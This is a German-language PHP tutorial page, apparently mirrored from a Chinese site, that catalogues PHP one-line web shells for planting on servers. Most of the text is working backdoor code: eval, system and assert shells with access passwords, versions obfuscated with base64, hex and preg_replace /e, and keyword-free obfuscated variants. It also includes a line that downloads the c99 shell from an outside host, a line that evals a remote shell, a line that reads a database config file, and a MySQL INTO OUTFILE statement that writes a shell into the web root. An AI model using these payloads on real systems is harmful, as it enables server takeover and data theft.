Heim > Backend-Entwicklung > PHP-Tutorial > PHP-Einsatz-Trojaner-Zusammenfassung und SQL-Anweisung zum Schreiben eines Einsatz-Trojaners

PHP-Einsatz-Trojaner-Zusammenfassung und SQL-Anweisung zum Schreiben eines Einsatz-Trojaners

藏色散人
Freigeben: 2023-04-07 14:42:01
nach vorne
4336 Leute haben es durchsucht

1. Ein Wort zur Basisklasse – die Funktion ist auf Verifizierungsschwachstellen beschränkt, die in der Praxis sehr leicht zu erkennen sind:

<?php @eval($_GET["code"])?>
<?php @system($_POST["cmd"])?>
Nach dem Login kopieren

2. Art der Kodierungsersetzung:

<?php @fputs(fopen(base64_decode(&#39;bG9zdC5waHA=&#39;),w),base64_decode(&#39;PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==&#39;));?>
//会生成<?php @eval($_POST[&#39;lostwolf&#39;]);?>

<script language="php">@fputs(fopen(base64_decode(&#39;bG9zdC5waHA=&#39;),w),base64_decode(&#39;PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==&#39;));</script>
//php在html内部的一种嵌入方式

<?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>


<?php
session_start();
$_POST[&#39;code&#39;] && $_SESSION[&#39;theCode&#39;] = trim($_POST[&#39;code&#39;]);
$_SESSION[&#39;theCode&#39;]&&preg_replace(&#39;\&#39;a\&#39;eis&#39;,&#39;e&#39;.&#39;v&#39;.&#39;a&#39;.&#39;l&#39;.&#39;(base64_decode($_SESSION[\&#39;theCode\&#39;]))&#39;,&#39;a&#39;);?>
Nach dem Login kopieren

3. Andere Typen:

<?php $_GET[a]($_GET[b]);?>
//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
<?php assert($_REQUEST["pass"]);?>     //菜刀连接 躲避检测 密码pass 
<?php substr(md5($_REQUEST[&#39;x&#39;]),28)==&#39;acd0&#39;&&eval($_REQUEST[&#39;pass&#39;]);?>
//菜刀提交  http://192.168.1.5/x.php?x=lostwolf  脚本类型:php  密码为 pass
Nach dem Login kopieren

4. Download-Typ:

<?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?> 
<? echo file_get_contents("..//cfg_database.php");?> //显示某文件
<? eval ( file_get_contents("远程shell")) ?> //运行远程shell
Nach dem Login kopieren

5. Kein Schlüsselfunktionstyp:

<?php
$_="";
$_[+""]=&#39;&#39;;
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${&#39;_&#39;.$_}[&#39;_&#39;](${&#39;_&#39;.$_}[&#39;__&#39;]);?>
http://site/2.php?_=assert&__=eval($_POST[&#39;pass&#39;]) 密码是pass
<?$_="";$_[+""]=&#39;_&#39;;$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
Nach dem Login kopieren

6. Ergänzende Wissenspunkte:

Schreiben Sie einen Satz in SQL (MySQL):

select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php"
#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以
Nach dem Login kopieren

Weitere PHP-bezogene Kenntnisse finden Sie auf der PHP-Chinese-Website!

Das obige ist der detaillierte Inhalt vonPHP-Einsatz-Trojaner-Zusammenfassung und SQL-Anweisung zum Schreiben eines Einsatz-Trojaners. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
php
Quelle:cnblogs.com
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage